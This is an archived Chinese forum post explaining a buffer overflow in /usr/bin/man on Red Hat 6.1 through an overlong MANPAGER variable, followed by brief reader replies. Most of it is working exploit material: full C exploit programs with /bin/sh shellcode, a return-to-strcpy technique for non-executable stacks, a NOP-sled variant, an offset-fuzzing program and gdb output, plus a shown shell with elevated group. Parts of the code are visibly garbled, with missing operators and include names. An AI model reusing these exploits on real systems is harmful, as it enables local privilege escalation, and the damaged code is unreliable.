缓冲区溢出分析-小白源码论坛 - Powered by Discuz! Archiver

a5656456 发表于 2015-9-3 17:32:52

缓冲区溢出分析

1. 简介
我在 http://www.hack.co.za/ 上看到 Lam3rZ 小组的 Kil3r 写的一个针对
redhat 6.1 (and others) /usr/bin/man exploit，下载回来后，直接编译运行，并
没有完成攻击。注意到原exploit是针对不可执行堆栈环境编写的，而我测试的主机
没有打不可执行堆栈补丁等等。其实针对不可执行堆栈环境的缓冲区溢出技术同样可
以用于"常规"环境，所以就此次攻击做一完整描述，抛砖引玉，见笑。
2. 问题描述
/usr/bin/man 会使用 MANPAGER 环境变量，关于这个变量的细节请 man man 查看。
当 MANPAGER 变量设置成超长字符串时，会导致 /usr/bin/man 执行中缓冲区溢出。
> export MANPAGER=`perl -e 'print "A"x1'`
> man ls
sh: A: command not found
Error executing formatting or display command.
System command (cd /usr/man ; (echo -e ".ll 9.9i\n.pl 1100i";
/bin/cat /usr/man/man1/ls.1; echo ".pl \n(nlu 10") | /usr/bin/gtbl |
/usr/bin/groff -Tlatin1 -mandoc | A) exited with status 127.
No manual entry for ls ^
> |
                  |
                  ------ export MANPAGER=`perl -e 'print "A"x3945'`
> man ls
sh: A...A: command not found
Error executing formatting or display command.
System command (cd /usr/man ; (echo -e ".ll 9.9i\n.pl 1100i";
/bin/cat /usr/man/man1/ls.1; echo ".pl \n(nlu 10") | /usr/bin/gtbl |
/usr/bin/groff -Tlatin1 -mandoc | A...A) exited with status 127.
Segmentation fault址造成，很可能某个函数的返回地址已经被覆盖掉
> unset MANPAGER >，具体的技术原理不再赘述。
Lam3rZ 小组的 Kil3r 所编写的exploit code采用的技术是，用于覆盖的返回地址指
向 strcpy() 函数的 PLT 入口(过程链接表入口)，同时在堆栈中利用 MANPAGER 变
量的缓冲区溢出，伪造一个发生常规 strcpy() 函数调用时所需要的假栈帧。
shellcode采用自定义环境变量的技术传递进入堆栈高区，因为使用了 execle() 函
数调用，该shellcode在 /usr/bin/man 进程地址空间中的位置相对固定，很容易猜
测调整。当返回地址被成功覆盖后，程序流程随着问题函数的返回而转向一个
strcpy() 函数调用，strcpy() 函数调用会将shellcode从 /usr/bin/man 进程的环
境变量区(堆栈高区)拷贝到另外一个区域，这个区域要求在不可执行堆栈环境下依旧
可写可执行，该区域必须在 /usr/bin/man 进程的地址空间内。显然，这个区域的地
址需要提前猜测确定，因为该区域的地址作为 strcpy() 函数调用的目标地址，必须
在伪造假栈帧时提供，后面我们会介绍猜测确定该区域地址的技术手段。
至于 strcpy() 函数调用完成，我们的shellcode已经进入可执行区域，流程又是如
何转向我们自己的shellcode，请参看tt在绿盟网络安全月刊第8期中的
>，内有图示，我看得头都快白了，总算
理解，chat* sigh。
从上面的攻击思路分析中完全可以看出，Lam3rZ 小组的 Kil3r 的攻击手段适用范围
要广些，所以我们先采用这种技术完成一次攻击。
4. 攻击第一步，猜测确定几个关键地址
(1) 确定 /usr/bin/man 中 strcpy() 函数的 PLT 入口
> gdb /usr/bin/man
GNU gdb 4.18
This GDB was configured as "i386-redhat-linux"...
(gdb) p strcpy
$1 = {} 0x80490e4
(gdb) q ^
> |
                        |
#define STRCPYPLT 0x080490e4 ------>------
因为缓冲区溢出发生在 /usr/bin/man 进程地址空间中，我们需要确定的 strcpy()
函数的 PLT 入口也应该是 /usr/bin/man 中 strcpy() 函数的 PLT 入口。该入口
和 /usr/bin/man 文件二进制映像有关，对于某个确定的elf格式的程序文件，该
入口相对固定。
(2) 猜测确定一个在不可执行堆栈环境下 /usr/bin/man 进程空间中可写可执行的区
域地址
> man ls
Ctrl-Zjobs
Stopped man ls
> ps -ef | grep man
scz 2377 1860 0 12:03 pts/2 00:00:00 man ls
> cat /proc/2377/maps
08050000-08051000 rw-p 00007000 03:06 36427 /usr/bin/man
> fg %1
q
这个区域显示的是可读写，并没有可执行，但实际是可执行的。我们挑选一个处在4
字节对齐边界上的地址，将来shellcode最终被拷贝到该地址并在该地址上开始执行。
#define SHELLCODETARGET 0x0805010c
注意，这里的 SHELLCODETARGET 需要出现在 MANPAGER 环境变量中，所以不得出现
零值。我当时挑选了 0x08050100 ，结果总是不能正确溢出，后来才想起这个毛病所
在。
我们可以不通过 /proc//maps 文件查找满足条件的区域地址，而直接使用
strcpy() 函数的 GOT 入口(全局偏移表入口)地址。
> gdb /usr/bin/man
GNU gdb 4.18
This GDB was configured as "i386-redhat-linux"...
(gdb) disas strcpy
0x80490e4: jmp *0x8050cac
0x80490ea: push $0x1d8 : jmp 0x8048d24
(gdb) x/1wx 0x8050cac : 0x080490ea
(gdb) q
>
#define STRCPYPLT 0x080490e4
#define STRCPYGOT 0x08050cac
#define SHELLCODETARGET STRCPYGOT
显然 STRCPYGOT 符合可写可执行区域的条件。可能你担心直接使用 STRCPYGOT 作为
目标地址，会影响到 strcpy() 函数本身的执行过程。仔细研读上面汇编代码，使用
STRCPYGOT 的时候还没有发生字符串拷贝，换句话说，发生字符串拷贝的时候已经无
所谓 STRCPYGOT 处是什么内容了，反正我们的shellcode是不会使用 strcpy() 函数
的。要是还不放心，就不要直接使用 STRCPYGOT 作为目标地址，而使用 STRCPYGOT
4 作为目标地址，只是不知道全局偏移表中 strcpy 入口地址的下一个又是什么函
数的入口地址，反正都无所谓。
(3) 猜测确定位于 /usr/bin/man 进程环境变量区的shellcode地址
下面的讨论基于一个假设，你已经明白elf文件的内存布局。我们需要通过环境变量
传递shellcode进入 /usr/bin/man 的进程空间，strcpy() 使用这里的shellcode作
为拷贝源。猜测确定拷贝源地址是必须的。
#define VULPROGRAM "/usr/bin/man"
#define SHELLCODESOURCE ( 0xbffffffc - sizeof( VULPROGRAM ) - sizeof( shellcode ) )
这里唯一需要注意的是 sizeof( VULPROGRAM ) 包括了结尾的'\0'。如果担心不够精
确，可以在shellcode的前部增加 NOP 指令。
上面的技术适用于i386/Linux平台，对于SPARC/Solaris平台这样相对复杂的情况，
还可以采用辅助程序观察execle()之后的内存布局，我们在条目6中介绍。
(4) 猜测确定问题缓冲区溢出点
实际上攻击从问题描述就已经开始了，发现问题的同时就开始了攻击过程，问题缓冲
区溢出点显然可以从 3945 9 = 3954 附近考虑。但是，不知道什么缘故，居然无
法得到core文件，也就无法深入调试，最后只好参看 Kil3r 的exploit code，发现
他使用的溢出点在4067，因为没有core文件，无法确定发生了什么，为什么3954已经
开始溢出，但真正有效溢出点却在4067，中间相差这么多字节，没有core的日子真难
过。
#define VULPOINT 4067
5. 编写针对不可执行堆栈环境的溢出攻击程序
/*
* File : ex_man.c for redhat 6.1 /usr/bin/man
* Author : Kil3r of Lam3rZ
* Rewriten : scz
* Complie : gcc -o ex_man ex_man.c
* Usage : ./ex_man
* Date : 2000-05-16
*/
#include
#include
#include
#include
#include
/* 一段标准的linux/i386下的shellcode */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define STRCPYPLT 0x080490e4
#define STRCPYGOT 0x08050cac
#define RETADDRESS STRCPYPLT /* 用于覆盖的返回地址 */
#define SHELLCODETARGET STRCPYGOT
#define SHELLCODESOURCE ( 0xbffffffc - sizeof( VULPROGRAM ) - sizeof( shellcode ) )
#define VULPROGRAM "/usr/bin/man"
#define VULPOINT 4067
#define SAFEPADLEN 24
#define PAD 'A'
#define SUCCESS 0
#define FAILURE -1
int main ( int argc, char * argv[] )
{
char * vulbuf;
char * env;
u_long * pointer;
u_long vulPoint = VULPOINT;
u_long vulBufSize = VULPOINT SAFEPADLEN;
fprintf( stderr, "Usage: %s [ vulPoint ]\n", argv );
if ( argc > 1 )
{
vulPoint = strtoul( argv, NULL, 10 );
vulBufSize = vulPoint SAFEPADLEN;
}
vulbuf = ( char * )malloc( ( size_t )( vulBufSize ) );
if ( vulbuf == 0 )
{
fprintf( stderr, "Can't allocate memory %lu bytes\n", vulBufSize );
exit( FAILURE );
}
fprintf( stderr, "vulPoint = %lu\n", vulPoint );
memset( vulbuf, PAD, vulBufSize );
vulbuf[ vulBufSize - 1 ] = '\0';
pointer = ( u_long * )( vulbuf vulPoint );
*pointer = RETADDRESS;
*pointer = SHELLCODETARGET;
*pointer = SHELLCODETARGET;
*pointer = SHELLCODESOURCE;
memcpy( vulbuf, "MANPAGER=", 9 );
env = vulbuf;
env = shellcode;
env = NULL;
execle( VULPROGRAM, VULPROGRAM, "ls", NULL, env );
free( vulbuf );
return( SUCCESS );
} /* end of main */
> cat > ex_man.c
> gcc -o ex_man ex_man.c
> ./ex_man
Usage: ./ex_man [ vulPoint ]
vulPoint = 4067
bash$ id
uid=505(scz) gid=100(users) egid=15(man) groups=100(users)
bash$ exit ^
exit |
> |
      溢出成功 ------>------
这里根本没有使用传统的 get_esp() 函数，而且这个exploit code适用于常规环境。
但是这种溢出攻击技术，需要精确覆盖返回地址，并且无法采用传统的大段返回地址
覆盖一片区域的方式，因为涉及到构造 strcpy() 函数调用假栈帧的技术问题。注意
到，实际上我们现在唯一需要调整的就是溢出点，可以考虑暴力猜测调整溢出点。再
就是，这次关键没有core dump出现，一般都有core dump，那样的话就可以不用暴力
猜测调整了。
我还碰到一个问题，该exploit code在SecureCRT或者CRT下执行都无法取得shell，
虽然段溢出发生了。仅仅当我使用telnet的时候才正确取得shell，原因未明。建议
如果实在无法取得shell，考虑换个终端工具试试(tt胡言乱语)，faint
6. 一个辅助观察execle()之后内存布局的小程序
/*
* gcc -o ev ev.c
* scz
*/
#include
#include
#include
#define SUCCESS 0
#define FAILURE -1
#define ENVDATA 0xbfffff00
#define ENVDATALEN 256
void outputBinary ( const unsigned char * byteArray, const size_t byteArrayLen )
{
u_long offset;
int i, j, k;
fprintf( stderr, "byteArray [ %lu bytes ] ----> \n", byteArrayLen );
if ( byteArrayLen0; k--, offset= 16 )
{
fprintf( stderr, "X ", offset );
for ( j = 0; j = ' ' ) && ( byteArray0; j-- )
{
fprintf( stderr, " " );
}
fprintf( stderr, " " );
for ( j = 0; j = ' ' ) && ( byteArray1 )
{
/* 采用16进制 */
envData = ( u_char * )strtoul( argv, NULL, 16 );
if ( argc > 2 )
{
   /* 采用10进制 */
   envDataLen = ( size_t )strtoul( argv, NULL, 10 );
}
}
fprintf( stderr, "Usage: %s [ envData ] [ envDataLen ]\n", argv );
fprintf( stderr, "envData = %p\n", envData );
fprintf( stderr, "envDataLen = %lu\n", envDataLen );
outputBinary( envData, envDataLen );
return( SUCCESS );
} /* end of main */
程序很简单，就是显示一段内存映像。我们所要做的，就是把exploit code里的几个
地方修改一下：
#define VULPROGRAM "./ev"
execle( VULPROGRAM, VULPROGRAM, "0xbfffff00", NULL, env );
这样观察得到的shellcode源地址显然不适用，因为这里的./ev和/usr/bin/man长度
不一样，熟悉elf文件格式的应该可以理解这点。于是我们简单处理一下：
cp ev usrbin_man
#define VULPROGRAM "./usrbin_man"
execle( VULPROGRAM, VULPROGRAM, "0xbfffff00", NULL, env );
此刻看到的shellcode源地址就和 /usr/bin/man 进程空间环境变量区里的一致了。
必须意识到 execle() 第一个形参对进程空间环境变量区的影响。
这种技术手段适用于SPARC/Solaris平台，我们利用它可以确定很多关键性地址，可
以调整那些需要n字节边界对齐的地方。
7. 编写针对常规环境下的溢出攻击程序
--------------------------------------------------------------------------
/*
* File : ex_man.c for redhat 6.1 /usr/bin/man
* Author : Kil3r of Lam3rZ
* Rewriten : warning3
* Complie : gcc -o ex_man ex_man.c
* Usage : ./ex_man
* Date : 2000-05-16
*/
#include
#include
#include
#include
#include
/* 一段标准的linux/i386下的shellcode */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define VULPROGRAM "/usr/bin/man"
#define VULPOINT 4067
#define NOP 0x90
#define SUCCESS 0
#define FAILURE -1
#define OFFSET 2000
unsigned long get_esp ( void )
{
__asm__
("
movl %esp, 陎
");
} /* end of get_esp */
int main ( int argc, char * argv[] )
{
char * env;
u_long * pointer;
u_long retAddress;
char vulbuf[ VULPOINT 5 ];
memset( vulbuf, NOP, VULPOINT 5 );
memcpy( vulbuf VULPOINT - ( strlen( shellcode ) 20 ),
   shellcode, strlen( shellcode ) );
retAddress = get_esp() OFFSET;
pointer = ( u_long * )( vulbuf VULPOINT );
*pointer = retAddress;
fprintf( stderr, "retAddress = 0xx\n", retAddress );
memcpy( vulbuf, "MANPAGER=", 9 );
vulbuf[ VULPOINT 4 ] = '\0';
env = vulbuf;
env = NULL;
execle( VULPROGRAM, VULPROGRAM, "ls", NULL, env );
return( SUCCESS );
} /* end of main */
在调试这个程序的时候，我们发现 MANPAGER 环境变量值长度在某个地方被检查过，
只是这个检查对于溢出攻击取得shell并没有起到保护作用。
为什么这里定义 OFFSET 为2000呢，可以采用条目6中的办法来观察一下execle()之
后环境变量区里的内容，简单修改如下：
--------------------------------------------------------------------------
#define VULPROGRAM "./usrbin_man"
... ...
execle( VULPROGRAM, VULPROGRAM, argv, NULL, env );
return( SUCCESS );
} /* end of main */
--------------------------------------------------------------------------
偏移为2000的时候返回地址落在NOP区内。那么溢出点4067呢？没办法，还是从前一
个程序里直接获知的，有core dump的时候可以调试确定。
8. 关于core文件以及确定溢出点
以前知道一点产生core dump的条件，但感受不深，今天都快要结束本篇灌水了，才
真正感受了一下。
我拷贝了一个/usr/bin/man到当前目录~scz/src下，然后定义问题程序为./man，此
时以scz用户身份运行exploit code，故意不正确覆盖返回地址，立即得到
core dump。
后来又以root身份在几个不同的当前目录下测试不同的组合情况，有些时候会得到
core dump，有些时候只报告段溢出。core文件是内存映像文件，与产生它的进程密
切相关，而产生进程对应硬盘文件的属主、权限以及当前执行它的用户身份都与是否
产生core dump有关。情况虽然很复杂很多，但至少有一点可以肯定，如果包括
exploit code和问题程序在内的的所有文件都是当前用户所有，段溢出时一般都会
core dump在当前目录下。对于上面的/usr/bin/man，我们完全可以调试./man找到
溢出点。此外需要提醒的是，如果希望得到正确的core dump，一定要先删除当前目
录下已经存在的core文件。
之所以这样限制core dump，应该有其安全方面的考虑。下面我们来简单看看如何确
定./man的溢出点。
--------------------------------------------------------------------------
/*
* gcc -o ex_man ex_man.c
*
* 目的就是产生core dump
*/
#include
#include
#include
#include
#include
#define VULPROGRAM "./man"
#define PAD_1 'A'
#define PAD_2 'B'
#define SUCCESS 0
#define FAILURE -1
int main ( int argc, char * argv[] )
{
char * vulbuf = NULL;
char * env;
u_long vulbufSize;
if ( argc != 2 )
{
fprintf( stderr, "Usage: %s \n", argv );
return( FAILURE );
}
vulbufSize = strtoul( argv, NULL, 10 );
vulbuf = ( char * )malloc( vulbufSize );
if ( vulbuf == NULL )
{
fprintf( stderr, "Can't allocate memory %lu bytes\n", vulbufSize );
return( FAILURE );
}
memset( vulbuf, PAD_1, vulbufSize );
vulbuf[ vulbufSize - 5 ] = PAD_2;
vulbuf[ vulbufSize - 4 ] = PAD_2;
vulbuf[ vulbufSize - 3 ] = PAD_2;
vulbuf[ vulbufSize - 2 ] = PAD_2;
vulbuf[ vulbufSize - 1 ] = '\0';
memcpy( vulbuf, "MANPAGER=", 9 );
env = vulbuf;
env = NULL;
execle( VULPROGRAM, VULPROGRAM, "ls", NULL, env );
free( vulbuf );
return( SUCCESS );
} /* end of main */
--------------------------------------------------------------------------
> ./ex_man 5000
Segmentation fault (core dumped)
> gdb ./man core
GNU gdb 4.18
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
#0 0x41414141 in ?? ()
(gdb) bt
#0 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) q
>
说明5000已经导致返回地址被覆盖成0x41414141，考虑减小该值。重复类似步骤，直
到发现4063仍未溢出，4064开始溢出，并core dump。
> ./ex_man 4063
> ./ex_man 4064
Segmentation fault (core dumped)
> gdb ./man core
GNU gdb 4.18
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
#0 0x41414141 in ?? ()
(gdb) bt
#0 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) q
> ./ex_man 4065
Segmentation fault (core dumped)
> gdb ./man core
Core was generated by `./man ls'.
Program terminated with signal 11, Segmentation fault.
#0 0x0 in ?? ()
(gdb) bt
#0 0x0 in ?? ()
(gdb) q
> ./ex_man 4066
Segmentation fault (core dumped)
> gdb ./man core
#0 0x804a3de in strcpy () at ../sysdeps/generic/strcpy.c:30
(gdb) bt
#0 0x804a3de in strcpy () at ../sysdeps/generic/strcpy.c:30
Cannot access memory at address 0xbf004236.
(gdb) q
> ./ex_man 4067
Segmentation fault (core dumped)
> gdb ./man core
#0 0x804a3de in strcpy () at ../sysdeps/generic/strcpy.c:30
30 ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) bt
#0 0x804a3de in strcpy () at ../sysdeps/generic/strcpy.c:30
Cannot access memory at address 0x424236.
(gdb) q
> ./ex_man 4068
Segmentation fault (core dumped)
> gdb ./man core
#0 0x804a362 in strcpy () at ../sysdeps/generic/strcpy.c:30
30 ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) bt
#0 0x804a362 in strcpy () at ../sysdeps/generic/strcpy.c:30
#1 0x807d948 in ?? ()
Cannot access memory at address 0x42424242.
(gdb) q
> ./ex_man 4069
Segmentation fault (core dumped)
> gdb ./man core
#0 0x8040042 in ?? ()
(gdb) bt
#0 0x8040042 in ?? ()
Cannot access memory at address 0x42424241.
(gdb) q
> ./ex_man 4070
Segmentation fault (core dumped)
> gdb ./man core
#0 0x8004242 in ?? ()
(gdb) bt
#0 0x8004242 in ?? ()
Cannot access memory at address 0x42424141.
(gdb) q
> ./ex_man 4071
Segmentation fault (core dumped)
> gdb ./man core
#0 0x424242 in ?? ()
(gdb) bt
#0 0x424242 in ?? ()
Cannot access memory at address 0x42414141.
(gdb) q
> ./ex_man 4072
Segmentation fault (core dumped)
> gdb ./man core
#0 0x42424242 in ?? ()
(gdb) bt
#0 0x42424242 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) q
> ./ex_man 4073
Segmentation fault (core dumped)
> gdb ./man core
#0 0x42424241 in ?? ()
(gdb) bt
#0 0x42424241 in ?? ()
Cannot access memory at address 0x41414141.
(gdb) q
>
在从4064到4073的分析观察过程中，我们显然已经看到，当取值4072的时候会覆盖一
个函数指针还是返回地址什么的，总之是个会导致控制流转移的4字节。注意到我们
测试程序中代码，溢出点应该在 4072 - 5 = 4067。至此，猜测确定溢出点的工作完
成了。至于为什么通过execle()执行和通过命令行shell执行时溢出点相差较远，我
也不清楚。看来以后确定溢出点，直接用程序猜测确定要准确些。
core文件的好处很多，这里仅仅列举了一种应用。以后看到core我就要看看什么宝贝
其中，说不好一个shadow就来了。grin
9. 总结
a) 可以利用条目6的办法观察execle()之后环境变量区内容，确定很多地址。
b) 无法溢出取得shell的时候尝试换个终端登录工具。
c) 没有core dump，你就去死吧。一定要想法得到core文件，进而调试确定问题程序
溢出点。得不到core时仔细检查相关文件权限以及当前用户身份。

b56qzm7pe 发表于 2015-9-3 16:52:13

好东西，看看。。。。。。。

cooboy 发表于 2015-9-3 17:18:28

支持，赞一个支持，赞一个

5y3sindieff 发表于 2015-9-3 17:36:51

为了源码有什么不能舍得的

epgnls8oInld 发表于 2015-9-3 17:22:54

伤心！！！没有金币

e9如花似玉 发表于 2015-9-3 17:42:16

这么强,支持楼主，佩服

sunhaowg 发表于 2015-9-3 17:58:32

sunhaowg 发表于 2015-9-3 17:36:37

epgnls8oInld 发表于 2015-9-3 17:29:43

厉害厉害

unxjqdhhiayg 发表于 2015-9-3 17:28:28

确实不错，顶先

页: [1] 2

小白源码论坛's Archiver

缓冲区溢出分析